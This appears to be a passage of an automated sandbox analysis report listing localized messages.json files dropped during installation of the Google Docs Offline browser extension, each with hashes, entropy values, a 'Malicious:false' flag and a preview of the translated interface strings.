                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1028
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                              MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                              SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                              SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                              SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                              MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                              SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                              SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                              SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                              MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                              SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                              SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                              SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2778
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                              MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                              SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                              SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                              SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1719
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                              MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                              SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                              SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                              SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):936
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                              MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                              SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                              SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                              SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3830
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                              MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                              SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                              SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                              SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1898
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                              MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                              SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                              SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                              SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                              MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                              SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                              SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                              SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                              MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                              SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                              SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                              SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2766
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                              MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                              SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                              SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                              SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):978
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                              MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                              SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                              SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                              SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                              MD5:608551F7026E6BA8C0CF85D9AC11F8E3
